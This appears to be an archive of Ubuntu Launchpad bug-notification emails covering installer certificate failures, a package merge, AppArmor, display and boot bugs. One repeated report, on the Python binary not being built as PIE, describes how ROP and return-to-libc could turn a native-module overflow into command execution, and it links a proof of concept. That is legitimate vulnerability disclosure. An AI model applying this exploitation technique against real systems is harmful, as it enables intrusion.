I believe this is caused by debootstrap - it only uses packages from the release pocket (and this is frozen from the time Ubuntu 20.04 LTS was originally released). This is a known issue https://askubuntu.com/questions/744684/latest-security-updates-with- debootstrap but I am not sure if there is much you can do to get debian- installer to say use multistrap instead of debootstrap. ** Package changed: ca-certificates (Ubuntu) => debian-installer (Ubuntu) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ca-certificates in Ubuntu. https://bugs.launchpad.net/bugs/1973654 Title: Using debian-installer on a server with a Let's Encrypt cert dies Status in debian-installer package in Ubuntu: New Bug description: While using debian-installer to install Ubuntu Focal, I get the following error: May 16 22:02:41 base-installer: Certificate verification failed: The certificate is NOT trusted. The certificate chain uses expired certificate. Could not handshake: Error in the certificate verification. [IP: 129.59.59.10 443] There was an issue in 2021, where the "DST_Root_CA_X3.crt" certificate used by Let's Encrypt expired. https://letsencrypt.org/docs/dst-root-ca-x3-expiration- september-2021/ The problem is that the certificate is still included in the "ca- certificates_20190110ubuntu1_all.deb" that debian-installer fetches during install. May 16 22:02:17 debootstrap: Preparing to unpack .../ca-certificates_20190110ubuntu1_all.deb ... May 16 22:02:17 debootstrap: Unpacking ca-certificates (20190110ubuntu1) ... May 16 22:02:31 debootstrap: Setting up ca-certificates (20190110ubuntu1) ... May 16 22:02:40 debootstrap: Processing triggers for ca-certificates (20190110ubuntu1) ... May 16 22:02:40 debootstrap: Running hooks in /etc/ca-certificates/update.d... Because the certificate is expired, debian-installer dies with: May 16 22:02:41 base-installer: Certificate verification failed: The certificate is NOT trusted. The certificate chain uses expired certificate. Could not handshake: Error in the certificate verification. [IP: 129.59.59.10 443] te is NOT trusted. The certificate chain uses expired certificate. Could not handshake: Error in the certificate verification. [IP: 129.59.59.10 443] Can Ubuntu update the ca-certificate .deb pulled during install to one that does not have DST_Root_CA_X3.crt? Thanks. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/debian-installer/+bug/1973654/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1971288] Re: Merge libseccomp from Debian unstable for kinetic
I uploaded https://launchpad.net/ubuntu/+source/libseccomp/2.5.4-1ubuntu1 earlier today. ** Changed in: libseccomp (Ubuntu) Status: New => Fix Committed -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libseccomp in Ubuntu. https://bugs.launchpad.net/bugs/1971288 Title: Merge libseccomp from Debian unstable for kinetic Status in libseccomp package in Ubuntu: Fix Committed Bug description: Upstream: tbd Debian: 2.5.4-1 Ubuntu: 2.5.3-2ubuntu2 ### Old Ubuntu Delta ### libseccomp (2.5.3-2ubuntu2) jammy; urgency=medium * No-change rebuild with Python 3.10 only -- Graham Inggs Thu, 17 Mar 2022 19:27:18 + libseccomp (2.5.3-2ubuntu1) jammy; urgency=medium * Merge from Debian unstable; remaining changes: - Add autopkgtests * Added changes: - Update autopkgtests to use syscalls from 5.16-rc1 -- Alex Murray Thu, 24 Feb 2022 09:53:35 +1030 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libseccomp/+bug/1971288/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1968397]
Thank you for using Ubuntu and taking the time to report a bug. Your report should contain, at a minimum, the following information so we can better find the source of the bug and work to resolve it. Submitting the bug about the proper source package is essential. For help see https://wiki.ubuntu.com/Bugs/FindRightPackage . Additionally, in the report please include: 1) The release of Ubuntu you are using, via 'cat /etc/lsb-release' or System -> About Ubuntu. 2) The version of the package you are using, via 'dpkg -l PKGNAME | cat' or by checking in Synaptic. 3) What happened and what you expected to happen. The Ubuntu community has also created debugging procedures for a wide variety of packages at https://wiki.ubuntu.com/DebuggingProcedures . Following the debugging instructions for the affected package will make your bug report much more complete. Thanks! -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/1968397 Title: bootloader Status in xorg package in Ubuntu: Invalid Bug description: root@a-ThinkPad-X220:~# apt install telnetd E: 无法获得锁 /var/lib/dpkg/lock-frontend - open (11: 资源暂时不可用) E: 无法获取 dpkg 前端锁 (/var/lib/dpkg/lock-frontend),是否有其他进程正占用它? root@a-ThinkPad-X220:~# apt install telnetd E: 无法获得锁 /var/lib/dpkg/lock-frontend - open (11: 资源暂时不可用) E: 无法获取 dpkg 前端锁 (/var/lib/dpkg/lock-frontend),是否有其他进程正占用它? root@a-ThinkPad-X220:~# killall ProblemType: Bug DistroRelease: Ubuntu 16.04 Package: xorg 1:7.7+13ubuntu3.1 ProcVersionSignature: Ubuntu 4.15.0-112.113~16.04.1-generic 4.15.18 Uname: Linux 4.15.0-112-generic x86_64 .tmp.unity_support_test.0: ApportVersion: 2.20.1-0ubuntu2.24 Architecture: amd64 CompizPlugins: No value set for `/apps/compiz-1/general/screen0/options/active_plugins' CompositorRunning: compiz CompositorUnredirectDriverBlacklist: '(nouveau|Intel).*Mesa 8.0' CompositorUnredirectFSW: true Date: Sat Apr 9 13:01:34 2022 DistUpgraded: Fresh install DistroCodename: xenial DistroVariant: ubuntu ExtraDebuggingInterest: No GraphicsCard: Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller [8086:0116] (rev 09) (prog-if 00 [VGA controller]) Subsystem: Lenovo 2nd Generation Core Processor Family Integrated Graphics Controller [17aa:21da] InstallationDate: Installed on 2022-04-07 (1 days ago) InstallationMedia: Ubuntu 16.04.7 LTS "Xenial Xerus" - Release amd64 (20200806) MachineType: LENOVO 4286AC9 ProcEnviron: LANGUAGE=zh_CN:zh PATH=(custom, no user) LANG=zh_CN.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.15.0-112-generic root=UUID=cf25f7a7-bda4-4979-9a0f-eb1cb472be49 ro quiet splash vt.handoff=7 SourcePackage: xorg UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 06/21/2018 dmi.bios.vendor: LENOVO dmi.bios.version: 8DET76WW (1.46 ) dmi.board.asset.tag: Not Available dmi.board.name: 4286AC9 dmi.board.vendor: LENOVO dmi.board.version: Not Available dmi.chassis.asset.tag: No Asset Information dmi.chassis.type: 10 dmi.chassis.vendor: LENOVO dmi.chassis.version: Not Available dmi.modalias: dmi:bvnLENOVO:bvr8DET76WW(1.46):bd06/21/2018:svnLENOVO:pn4286AC9:pvrThinkPadX220:rvnLENOVO:rn4286AC9:rvrNotAvailable:cvnLENOVO:ct10:cvrNotAvailable: dmi.product.family: ThinkPad X220 dmi.product.name: 4286AC9 dmi.product.version: ThinkPad X220 dmi.sys.vendor: LENOVO version.compiz: compiz 1:0.9.12.3+16.04.20180221-0ubuntu1 version.ia32-libs: ia32-libs N/A version.libdrm2: libdrm2 2.4.91-2~16.04.1 version.libgl1-mesa-dri: libgl1-mesa-dri 18.0.5-0ubuntu0~16.04.1 version.libgl1-mesa-dri-experimental: libgl1-mesa-dri-experimental N/A version.libgl1-mesa-glx: libgl1-mesa-glx 18.0.5-0ubuntu0~16.04.1 version.xserver-xorg-core: xserver-xorg-core N/A version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A version.xserver-xorg-video-ati: xserver-xorg-video-ati N/A version.xserver-xorg-video-intel: xserver-xorg-video-intel N/A version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau N/A xserver.bootTime: Sat Apr 9 20:55:35 2022 xserver.configfile: default xserver.errors: xserver.logfile: /var/log/Xorg.0.log xserver.version: 2:1.19.6-1ubuntu4.1~16.04.2 xserver.video_driver: modeset To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/1968397/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1968397] Re: bootloader
Thank you for taking the time to report this bug and helping to make Ubuntu better. Unfortunately we can't fix it, because your description didn't include enough information. You may find it helpful to read 'How to report bugs effectively' http://www.chiark.greenend.org.uk/~sgtatham/bugs.html. We'd be grateful if you would then provide a more complete description of the problem. We have instructions on debugging some types of problems at http://wiki.ubuntu.com/DebuggingProcedures. At a minimum, we need: 1. the specific steps or actions you took that caused you to encounter the problem, 2. the behavior you expected, and 3. the behavior you actually encountered (in as much detail as possible). Thanks! ** Changed in: xorg (Ubuntu) Status: New => Incomplete ** Information type changed from Private Security to Public ** Changed in: xorg (Ubuntu) Status: Incomplete => Invalid -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/1968397 Title: bootloader Status in xorg package in Ubuntu: Invalid Bug description: root@a-ThinkPad-X220:~# apt install telnetd E: 无法获得锁 /var/lib/dpkg/lock-frontend - open (11: 资源暂时不可用) E: 无法获取 dpkg 前端锁 (/var/lib/dpkg/lock-frontend),是否有其他进程正占用它? root@a-ThinkPad-X220:~# apt install telnetd E: 无法获得锁 /var/lib/dpkg/lock-frontend - open (11: 资源暂时不可用) E: 无法获取 dpkg 前端锁 (/var/lib/dpkg/lock-frontend),是否有其他进程正占用它? root@a-ThinkPad-X220:~# killall ProblemType: Bug DistroRelease: Ubuntu 16.04 Package: xorg 1:7.7+13ubuntu3.1 ProcVersionSignature: Ubuntu 4.15.0-112.113~16.04.1-generic 4.15.18 Uname: Linux 4.15.0-112-generic x86_64 .tmp.unity_support_test.0: ApportVersion: 2.20.1-0ubuntu2.24 Architecture: amd64 CompizPlugins: No value set for `/apps/compiz-1/general/screen0/options/active_plugins' CompositorRunning: compiz CompositorUnredirectDriverBlacklist: '(nouveau|Intel).*Mesa 8.0' CompositorUnredirectFSW: true Date: Sat Apr 9 13:01:34 2022 DistUpgraded: Fresh install DistroCodename: xenial DistroVariant: ubuntu ExtraDebuggingInterest: No GraphicsCard: Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller [8086:0116] (rev 09) (prog-if 00 [VGA controller]) Subsystem: Lenovo 2nd Generation Core Processor Family Integrated Graphics Controller [17aa:21da] InstallationDate: Installed on 2022-04-07 (1 days ago) InstallationMedia: Ubuntu 16.04.7 LTS "Xenial Xerus" - Release amd64 (20200806) MachineType: LENOVO 4286AC9 ProcEnviron: LANGUAGE=zh_CN:zh PATH=(custom, no user) LANG=zh_CN.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.15.0-112-generic root=UUID=cf25f7a7-bda4-4979-9a0f-eb1cb472be49 ro quiet splash vt.handoff=7 SourcePackage: xorg UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 06/21/2018 dmi.bios.vendor: LENOVO dmi.bios.version: 8DET76WW (1.46 ) dmi.board.asset.tag: Not Available dmi.board.name: 4286AC9 dmi.board.vendor: LENOVO dmi.board.version: Not Available dmi.chassis.asset.tag: No Asset Information dmi.chassis.type: 10 dmi.chassis.vendor: LENOVO dmi.chassis.version: Not Available dmi.modalias: dmi:bvnLENOVO:bvr8DET76WW(1.46):bd06/21/2018:svnLENOVO:pn4286AC9:pvrThinkPadX220:rvnLENOVO:rn4286AC9:rvrNotAvailable:cvnLENOVO:ct10:cvrNotAvailable: dmi.product.family: ThinkPad X220 dmi.product.name: 4286AC9 dmi.product.version: ThinkPad X220 dmi.sys.vendor: LENOVO version.compiz: compiz 1:0.9.12.3+16.04.20180221-0ubuntu1 version.ia32-libs: ia32-libs N/A version.libdrm2: libdrm2 2.4.91-2~16.04.1 version.libgl1-mesa-dri: libgl1-mesa-dri 18.0.5-0ubuntu0~16.04.1 version.libgl1-mesa-dri-experimental: libgl1-mesa-dri-experimental N/A version.libgl1-mesa-glx: libgl1-mesa-glx 18.0.5-0ubuntu0~16.04.1 version.xserver-xorg-core: xserver-xorg-core N/A version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A version.xserver-xorg-video-ati: xserver-xorg-video-ati N/A version.xserver-xorg-video-intel: xserver-xorg-video-intel N/A version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau N/A xserver.bootTime: Sat Apr 9 20:55:35 2022 xserver.configfile: default xserver.errors: xserver.logfile: /var/log/Xorg.0.log xserver.version: 2:1.19.6-1ubuntu4.1~16.04.2 xserver.video_driver: modeset To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/1968397/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1968402] Re: Ubuntu 20.04.3 boots to black screen, no TTY available
Thanks for taking the time to report this bug and helping to make Ubuntu better. We appreciate the difficulties you are facing, but this appears to be a "regular" (non-security) bug. I have unmarked it as a security issue since this bug does not show evidence of allowing attackers to cross privilege boundaries nor directly cause loss of data/privacy. Please feel free to report any other bugs you may find. ** Information type changed from Private Security to Public -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/1968402 Title: Ubuntu 20.04.3 boots to black screen, no TTY available Status in gdm: New Status in gnome-session: New Status in grub: New Status in os-prober-efi/trunk: New Status in shim: New Status in subiquity: New Status in tty: New Status in grub2 package in Ubuntu: New Status in mutter package in Ubuntu: New Status in nvidia-graphics-drivers-450 package in Ubuntu: New Status in wayland package in Ubuntu: New Status in xorg package in Ubuntu: New Bug description: A fresh attempted install failed utterly, just as 20.04.1 failed two years ago. Has anyone been paying attention? Ubuntu 20.04.3 burned just now to a USB stick and attempted to be installed. The first fail was that the stick booted to a couple of impenetrable boot-time messages and hung. Really. I'm not making this up. It didn't just open the installer, as it should. The second fail was having just to guess that rebooting and trying another GRUB menu option might work and give that a try. Really. I'm not making this up, either. The installer was entirely incapable of providing any direction The third failure was that the installer was incapable of detecting the video configuration and proceeding accordingly. This is 20.04.3, the third attempt at getting this right, and it still fails. The fourth fail was an error message insisting on a designation of where root should be, even after the destination partition already had been specified. The fifth failure was that no obvious means existed to satisfy the installer about the root specification, which of course already had been made by specifying the destination partition. All one could do was to see whether a context menu existed for any object on the screen that might possibly drill down through a few layers to something approximating what the content of the error message suggested. The sixth failure was that no GRUB menu appeared during boot, notwithstanding that the EFI system partition had clearly been identified in the installer. The seventh failure was that the machine booted only to a black screen with a non-blinking _ midway toward the upper left. No login screen/display manager. No GUI at all. Just this little _. The eighth failure was that Ctrl-alt-f2, ctrl-alt-f5-f12 have no effect. No TTY is available. There is no way whatsoever to interact with the system. Expected behavior: The software would install and the computer would work. Actual behavior: The installer bricked my workstation. Obviously, no debug information is available BECAUSE THE SOFTWARE FAILED. This post is being made from a borrowed Windows laptop. Any thoughts about how to get a working system would be appreciated. I am not optimistic about the prospects for 22.04. To manage notifications about this bug go to: https://bugs.launchpad.net/gdm/+bug/1968402/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1452115] Re: Python interpreter binary is not compiled as PIE
Nice - thanks @sdeziel -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to python2.7 in Ubuntu. https://bugs.launchpad.net/bugs/1452115 Title: Python interpreter binary is not compiled as PIE Status in Python: New Status in python2.7 package in Ubuntu: Fix Released Status in python3.10 package in Ubuntu: Fix Released Status in python3.4 package in Ubuntu: Fix Released Status in python3.6 package in Ubuntu: Confirmed Status in python3.7 package in Ubuntu: Confirmed Status in python3.8 package in Ubuntu: Confirmed Status in python3.9 package in Ubuntu: New Status in python3.7 package in Debian: New Status in python3.8 package in Debian: New Bug description: The python2.7 binary (installed at /usr/bin/python2.7; package version 2.7.6-8) is not compiled as a position independent executable (PIE). It appears that the python compilation process is somewhat arcane and the hardening wrapper probably doesn't do the trick for it. This is incredibly dangerous as it means that any vulnerability within a native module (e.g. ctypes-based), or within python itself will expose an incredibly large amount of known memory contents at known addresses (including a large number of dangerous instruction groupings). This enables ROP-based (https://en.wikipedia.org/wiki/Return-oriented_programming) to abuse the interpreter itself to bypass non-executable page protections. I have put together an example vulnerable C shared object (with a buffer overflow) accessed via python through the ctypes interface as an example. This uses a single ROP "gadget" on top of using the known PLT location for system(3) (https://en.wikipedia.org/wiki/Return-to-libc_attack) to call "id". The example code is accessible at: - https://gist.github.com/ChaosData/ae6076cb1c3cc7b0a367 I'm not exactly familiar enough with the python build process to say where exactly an -fPIE needs to be injected into a script/makefile, but I feel that given the perceived general preference for ctypes- based modules over python written ones, as the native code implementations tend to be more performant, this feels like a large security hole within the system. Given the nature of this "issue," I'm not 100% sure of where it is best reported, but from what I can tell, this conflicts with the Ubuntu hardening features and is definitely exploitable should a native module contain a sufficiently exploitable vulnerability that allows for control of the instruction register. To manage notifications about this bug go to: https://bugs.launchpad.net/python/+bug/1452115/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1452115] Re: Python interpreter binary is not compiled as PIE
Thanks @doko :) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to python2.7 in Ubuntu. https://bugs.launchpad.net/bugs/1452115 Title: Python interpreter binary is not compiled as PIE Status in Python: New Status in python2.7 package in Ubuntu: Fix Released Status in python3.10 package in Ubuntu: Fix Committed Status in python3.4 package in Ubuntu: Fix Released Status in python3.6 package in Ubuntu: Confirmed Status in python3.7 package in Ubuntu: Confirmed Status in python3.8 package in Ubuntu: Confirmed Status in python3.9 package in Ubuntu: New Status in python3.7 package in Debian: New Status in python3.8 package in Debian: New Bug description: The python2.7 binary (installed at /usr/bin/python2.7; package version 2.7.6-8) is not compiled as a position independent executable (PIE). It appears that the python compilation process is somewhat arcane and the hardening wrapper probably doesn't do the trick for it. This is incredibly dangerous as it means that any vulnerability within a native module (e.g. ctypes-based), or within python itself will expose an incredibly large amount of known memory contents at known addresses (including a large number of dangerous instruction groupings). This enables ROP-based (https://en.wikipedia.org/wiki/Return-oriented_programming) to abuse the interpreter itself to bypass non-executable page protections. I have put together an example vulnerable C shared object (with a buffer overflow) accessed via python through the ctypes interface as an example. This uses a single ROP "gadget" on top of using the known PLT location for system(3) (https://en.wikipedia.org/wiki/Return-to-libc_attack) to call "id". The example code is accessible at: - https://gist.github.com/ChaosData/ae6076cb1c3cc7b0a367 I'm not exactly familiar enough with the python build process to say where exactly an -fPIE needs to be injected into a script/makefile, but I feel that given the perceived general preference for ctypes- based modules over python written ones, as the native code implementations tend to be more performant, this feels like a large security hole within the system. Given the nature of this "issue," I'm not 100% sure of where it is best reported, but from what I can tell, this conflicts with the Ubuntu hardening features and is definitely exploitable should a native module contain a sufficiently exploitable vulnerability that allows for control of the instruction register. To manage notifications about this bug go to: https://bugs.launchpad.net/python/+bug/1452115/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1964325] Re: Fails to print due to apparmor denied connect operation for cupsd - /run/systemd/userdb/io.systemd.Machine
I have proposed a fix for this upstream - https://gitlab.com/apparmor/apparmor/-/merge_requests/861 - once that is reviewed then we can include the fix in jammy. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1964325 Title: Fails to print due to apparmor denied connect operation for cupsd - /run/systemd/userdb/io.systemd.Machine Status in apparmor package in Ubuntu: New Bug description: On an up to date Jammy machine, printing fails and there is the following apparmor denied message in the journal: apparmor="DENIED" operation="connect" profile="/usr/sbin/cupsd" name="/run/systemd/userdb/io.systemd.Machine" pid=892182 comm="cupsd" requested_mask="w" denied_mask="w" fsuid=0 ouid=0 Printing works after running aa-complain cupsd. The printer is a driverless HP Envy 5020 ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: apparmor 3.0.4-2ubuntu1 ProcVersionSignature: Ubuntu 5.15.0-18.18-generic 5.15.12 Uname: Linux 5.15.0-18-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.11-0ubuntu78 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: ubuntu:GNOME Date: Wed Mar 9 10:25:10 2022 InstallationDate: Installed on 2020-05-31 (647 days ago) InstallationMedia: Ubuntu 20.10 "Groovy Gorilla" - Alpha amd64 (20200527) ProcKernelCmdline: BOOT_IMAGE=/BOOT/ubuntu_nt06gx@/vmlinuz-5.15.0-18-generic root=ZFS=rpool/ROOT/ubuntu_nt06gx ro snd-intel-dspcfg.dsp_driver=1 RebootRequiredPkgs: Error: path contained symlinks. SourcePackage: apparmor UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1964325/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1452115] Re: Python interpreter binary is not compiled as PIE
For posterity - this is how I did the analysis above: # download the current python3.9 source package and rebuild it with PIE enabled apt source python3.9 cd python3.9-3.9.10/ sed -i "/export DEB_BUILD_MAINT_OPTIONS=hardening=-pie/d" debian/rules dch -i -D jammy "Enable PIE (LP: #1452115)" update-maintainer # sbuild assumes you already have a jammy-amd64 schroot setup sbuild # use a LXD VM for testing lxc launch --vm images:ubuntu/jammy sec-jammy-amd64 # stop the VM and disable UEFI secure boot lxc stop sec-jammy-amd64 # ensure secureboot is not used so we can use the msr module later lxc config set set-jammy-amd64 security.secureboot=false lxc start sec-jammy-amd64 # make sure VM has full disk allocated lxc exec sec-jammy-amd64 -- growpart /dev/sda 2 lxc exec sec-jammy-amd64 -- resize2fs /dev/sda2 lxc file push ../*.deb sec-jammy-amd64/root/ lxc shell sec-jammy-amd64 # then inside the LXD VM install and run pyperformance with and without the new python3.9 apt install python3-pip pip3 install pyperformance # tune for system performance modprobe msr python3.9 -m pyperf system tune # get baseline numbers without PIE pyperformance run --python=/usr/bin/python3.9 -o py3.9.json # install our debs we built above that have PIE enabled apt install ./python3.9_3.9.10-2ubuntu1_amd64.deb ./libpython3.9-stdlib_3.9.10-2ubuntu1_amd64.deb ./python3.9-minimal_3.9.10-2ubuntu1_amd64.deb ./libpython3.9-minimal_3.9.10-2ubuntu1_amd64.deb ./libpython3.9_3.9.10-2ubuntu1_amd64.deb ./libpython3.9-dev_3.9.10-2ubuntu1_amd64.deb ./python3.9-dev_3.9.10-2ubuntu1_amd64.deb # check they have PIE apt install devscripts hardening-check /usr/bin/python3.9 # re-run pyperformance with PIE pyperformance run --python=/usr/bin/python3.9 -o py3.9-pie.json # and compare the results python3 -m pyperf compare_to py3.9.json py3.9-pie.json --table -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to python2.7 in Ubuntu. https://bugs.launchpad.net/bugs/1452115 Title: Python interpreter binary is not compiled as PIE Status in Python: New Status in python2.7 package in Ubuntu: Fix Released Status in python3.10 package in Ubuntu: New Status in python3.4 package in Ubuntu: Fix Released Status in python3.6 package in Ubuntu: Confirmed Status in python3.7 package in Ubuntu: Confirmed Status in python3.8 package in Ubuntu: Confirmed Status in python3.9 package in Ubuntu: New Status in python3.7 package in Debian: New Status in python3.8 package in Debian: New Bug description: The python2.7 binary (installed at /usr/bin/python2.7; package version 2.7.6-8) is not compiled as a position independent executable (PIE). It appears that the python compilation process is somewhat arcane and the hardening wrapper probably doesn't do the trick for it. This is incredibly dangerous as it means that any vulnerability within a native module (e.g. ctypes-based), or within python itself will expose an incredibly large amount of known memory contents at known addresses (including a large number of dangerous instruction groupings). This enables ROP-based (https://en.wikipedia.org/wiki/Return-oriented_programming) to abuse the interpreter itself to bypass non-executable page protections. I have put together an example vulnerable C shared object (with a buffer overflow) accessed via python through the ctypes interface as an example. This uses a single ROP "gadget" on top of using the known PLT location for system(3) (https://en.wikipedia.org/wiki/Return-to-libc_attack) to call "id". The example code is accessible at: - https://gist.github.com/ChaosData/ae6076cb1c3cc7b0a367 I'm not exactly familiar enough with the python build process to say where exactly an -fPIE needs to be injected into a script/makefile, but I feel that given the perceived general preference for ctypes- based modules over python written ones, as the native code implementations tend to be more performant, this feels like a large security hole within the system. Given the nature of this "issue," I'm not 100% sure of where it is best reported, but from what I can tell, this conflicts with the Ubuntu hardening features and is definitely exploitable should a native module contain a sufficiently exploitable vulnerability that allows for control of the instruction register. To manage notifications about this bug go to: https://bugs.launchpad.net/python/+bug/1452115/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1452115] Re: Python interpreter binary is not compiled as PIE
I am actively looking at this - FWIW the performance results with PIE enabled look good - https://paste.ubuntu.com/p/PZjqMFSNSR/ - so I am discussing internally whether this is something that can still land for Ubuntu 22.04. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to python2.7 in Ubuntu. https://bugs.launchpad.net/bugs/1452115 Title: Python interpreter binary is not compiled as PIE Status in Python: New Status in python2.7 package in Ubuntu: Fix Released Status in python3.10 package in Ubuntu: New Status in python3.4 package in Ubuntu: Fix Released Status in python3.6 package in Ubuntu: Confirmed Status in python3.7 package in Ubuntu: Confirmed Status in python3.8 package in Ubuntu: Confirmed Status in python3.9 package in Ubuntu: New Status in python3.7 package in Debian: New Status in python3.8 package in Debian: New Bug description: The python2.7 binary (installed at /usr/bin/python2.7; package version 2.7.6-8) is not compiled as a position independent executable (PIE). It appears that the python compilation process is somewhat arcane and the hardening wrapper probably doesn't do the trick for it. This is incredibly dangerous as it means that any vulnerability within a native module (e.g. ctypes-based), or within python itself will expose an incredibly large amount of known memory contents at known addresses (including a large number of dangerous instruction groupings). This enables ROP-based (https://en.wikipedia.org/wiki/Return-oriented_programming) to abuse the interpreter itself to bypass non-executable page protections. I have put together an example vulnerable C shared object (with a buffer overflow) accessed via python through the ctypes interface as an example. This uses a single ROP "gadget" on top of using the known PLT location for system(3) (https://en.wikipedia.org/wiki/Return-to-libc_attack) to call "id". The example code is accessible at: - https://gist.github.com/ChaosData/ae6076cb1c3cc7b0a367 I'm not exactly familiar enough with the python build process to say where exactly an -fPIE needs to be injected into a script/makefile, but I feel that given the perceived general preference for ctypes- based modules over python written ones, as the native code implementations tend to be more performant, this feels like a large security hole within the system. Given the nature of this "issue," I'm not 100% sure of where it is best reported, but from what I can tell, this conflicts with the Ubuntu hardening features and is definitely exploitable should a native module contain a sufficiently exploitable vulnerability that allows for control of the instruction register. To manage notifications about this bug go to: https://bugs.launchpad.net/python/+bug/1452115/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1962276] Re: [jammy] Laptop monitor does not turn off/disconnect when the lid is closed
See this related debian bug https://bugs.debian.org/cgi- bin/bugreport.cgi?bug=1006368 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to upower in Ubuntu. https://bugs.launchpad.net/bugs/1962276 Title: [jammy] Laptop monitor does not turn off/disconnect when the lid is closed Status in gnome-settings-daemon package in Ubuntu: New Status in linux package in Ubuntu: Confirmed Status in mutter package in Ubuntu: New Status in upower package in Ubuntu: New Bug description: After today's updates I can no longer run my Laptop in clam shell mode. I don't use a dock. I connect the second monitor via HDMI cable and and external keyboard/mouse via a USB hub. Usually I can just plugin the monitor and close the lid and the primary display will switch to the external monitor. Now it will default to Monitor 2 as part of the joint display. I also tested booting the machine and closing the lid but this still defaulted to the external monitor as the 2nd display. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: xorg 1:7.7+23ubuntu1 ProcVersionSignature: Ubuntu 5.15.0-18.18-generic 5.15.12 Uname: Linux 5.15.0-18-generic x86_64 ApportVersion: 2.20.11-0ubuntu78 Architecture: amd64 BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log' CasperMD5CheckResult: pass CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Fri Feb 25 16:44:37 2022 DistUpgraded: Fresh install DistroCodename: jammy DistroVariant: ubuntu ExtraDebuggingInterest: Yes, if not too technical GraphicsCard: Intel Corporation HD Graphics 5500 [8086:1616] (rev 09) (prog-if 00 [VGA controller]) Subsystem: Lenovo HD Graphics 5500 [17aa:2226] InstallationDate: Installed on 2022-02-23 (1 days ago) InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Alpha amd64 (20220202) MachineType: LENOVO 20CLS3JN0F ProcEnviron: LANGUAGE=en_NZ:en PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_NZ.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.15.0-18-generic root=/dev/mapper/vgubuntu-root ro quiet splash vt.handoff=7 SourcePackage: xorg Symptom: display UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 03/05/2015 dmi.bios.release: 1.7 dmi.bios.vendor: LENOVO dmi.bios.version: N10ET30W (1.07 ) dmi.board.asset.tag: Not Available dmi.board.name: 20CLS3JN0F dmi.board.vendor: LENOVO dmi.board.version: SDK0E50510 WIN 